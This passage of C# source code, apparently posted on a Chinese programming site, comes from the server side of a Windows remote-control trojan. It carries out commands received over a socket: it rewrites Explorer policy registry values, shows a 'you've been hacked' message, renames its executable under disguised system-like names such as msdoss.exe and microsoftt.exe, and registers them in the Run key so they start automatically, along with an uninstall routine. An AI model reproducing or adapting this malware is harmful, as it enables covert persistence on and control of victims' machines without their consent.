       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoLogOff",0);
       key2.SetValue("NoDrives",0);
       key2.SetValue("NoDesktop",0);

       key2.Close();
       

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if

    //********************************************
    if(ss=="zs0111")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoDrives",0);
      key1.SetValue("NoClose",0);
      key1.SetValue("NoDesktop",0);

 

      key1.Close();
      mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDrives、NoDesktop被修改!请将它置为0";

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoDrives",0);
       key2.SetValue("NoClose",0);
       key2.SetValue("NoDesktop",0);

       key2.Close();
       

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    //********************************************
    if(ss=="zs1111")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoLogOff",0);
      key1.SetValue("NoClose",0);
      key1.SetValue("NoDrives",0);
      key1.SetValue("NoDesktop",0);

 


      key1.Close();
      

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoLogOff",0);
       key2.SetValue("NoClose",0);
       key2.SetValue("NoDrives",0);
       key2.SetValue("NoDesktop",0);

       key2.Close();
       

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if

//PPPPPPPPPPPPPPPPPPPPPPPPPPPP以上是善意修改部分PPPPPPPPPPPPPPPPPPPPPPPPPP

//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>以下是警告>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    if(ss=="jg0000")
    {
     MessageBox.Show("你被我黑了!");
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    }

   //>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>以上是警告>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
   //&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&以下是建议&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
   if(ss=="jy0000")
   {
    MessageBox.Show(mystr);
    string str="hkz";
    byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
    socket.Send(bytee,bytee.Length,0);
   }
   //&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&以上是建议&&&&&&&&&&&&&&&&&&&&&&&&&&&

   //##################################以下是修改木马位置###################
   //||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
   if(ss=="mw1000")
   {
    try{ File.Move("c:\\winnt\\system\\expleror.exe","c:\\winnt\\system32\\msdoss.exe");}
    catch{}
    
    try
    {
     key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
     key1.SetValue("msdoss","c:\\winnt\\system32\\msdoss.exe");
      
      
     key1.Close();


    }
    catch{}
    if(key1==null)
    {
     try
     {
      RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
      key2.SetValue("msdoss","c:\\winnt\\system32\\msdoss.exe");
      key2.Close();
       

     }//try
     catch{}
    }//if(key1==null){
    string str="hkz";
    byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
    socket.Send(bytee,bytee.Length,0);
    
   }
   //|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

   //_____________________________________________________________________

   if(ss=="mw0100")
   {
    try{File.Move("c:\\winnt\\system\\expleror.exe","d:\\winnt\\system32\\microsoftt.exe");}
    catch{}
     
    try
    {
     key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
     key1.SetValue("microsoftt","d:\\winnt\\system32\\microsoftt.exe");
      
      
     key1.Close();


    }
    catch{}
    if(key1==null)
    {
     try
     {
      RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
      key2.SetValue("microsoftt","d:\\winnt\\system32\\microsoftt.exe");
      key2.Close();
       

     }//try
     catch{}
    }//if(key1==null){
    string str="hkz";
    byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
    socket.Send(bytee,bytee.Length,0);
    
    
   }
   //______________________________________________________________________


   //=======================================================================
   if(ss=="mw0010")
   {
    try{File.Move("c:\\winnt\\system32\\msdoss.exe","c:\\winnt\\system\\expleror.exe");}
    catch{}
     
    try
    {
     key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
     key1.SetValue("expleror","c:\\winnt\\system\\expleror.exe");
      
      
     key1.Close();


    }
    catch{}
    if(key1==null)
    {
     try
     {
      RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
      key2.SetValue("expleror","c:\\winnt\\system\\expleror");
      key2.Close();
       

     }//try
     catch{}
    }//if(key1==null){
    string str="hkz";
    byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
    socket.Send(bytee,bytee.Length,0);
    
    
   }


   //===================================================================
   //*******************************************************************
   if(ss=="mw0001")
   {
    try{File.Move("d:\\winnt\\system32\\microsoftt.exe","c:\\winnt\\system\\expleror.exe");}
    catch{}
     
    try
    {
     key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
     key1.SetValue("expleror","c:\\winnt\\system\\expleror.exe");
      
      
     key1.Close();


    }
    catch{}
    if(key1==null)
    {
     try
     {
      RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
      key2.SetValue("expleror","c:\\winnt\\system\\expleror");
      key2.Close();
       

     }//try
     catch{}
    }//if(key1==null){
    string str="hkz";
    byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
    socket.Send(bytee,bytee.Length,0);
    
    
    
    
   }

   //*************************************************************************

   //##################################以上是改变位置##########################
   //··················以下是卸载木马·················
   if(ss=="xz0000")
   {
            
     
    try
    {
     key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
     try{key1.DeleteValue("expleror");}
     catch{}
     try{key1.DeleteValue("msdoss");}
     catch{}
     try{key1.DeleteValue("microsoftt");}
     catch{}
      
     key1.Close();


    }
    catch{}
    
     
    string str="hkz";
    byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
    socket.Send(bytee,bytee.Length,0);
               
    
   }


   //··················以上是卸载木马·················

   
  }//socket
  


  //
  // TODO: Add any constructor code after InitializeComponent call
  //
 }//targett


  /// <summary>
  /// 清理所有正在使用的资源。
  /// </summary>
  protected override void Dispose( bool disposing )
  {
   if( disposing )
   {
    if (components != null)
    {
     components.Dispose();
    }
   }
   base.Dispose( disposing );
  }

  #region Windows Form Designer generated code
  /// <summary>
  /// 设计器支持所需的方法 - 不要使用代码编辑器修改
  /// 此方法的内容。
  /// </summary>
  private void InitializeComponent()
  {
   //
   // Form1
   //
   this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
   this.ClientSize = new System.Drawing.Size(292, 266);
   this.Name = "Form1";
   this.Text = "Form1";
   this.Load += new System.EventHandler(this.Form1_Load);

  }
  #endregion

  /// <summary>
  /// 应用程序的主入口点。
  /// </summary>
  [STAThread]
  static void Main()
  {
   Application.Run(new Form1());
  }

  private void Form1_Load(object sender, System.EventArgs e)
  {
  
  }
 }
}

本文地址:http://com.8s8s.com/it/it42252.htm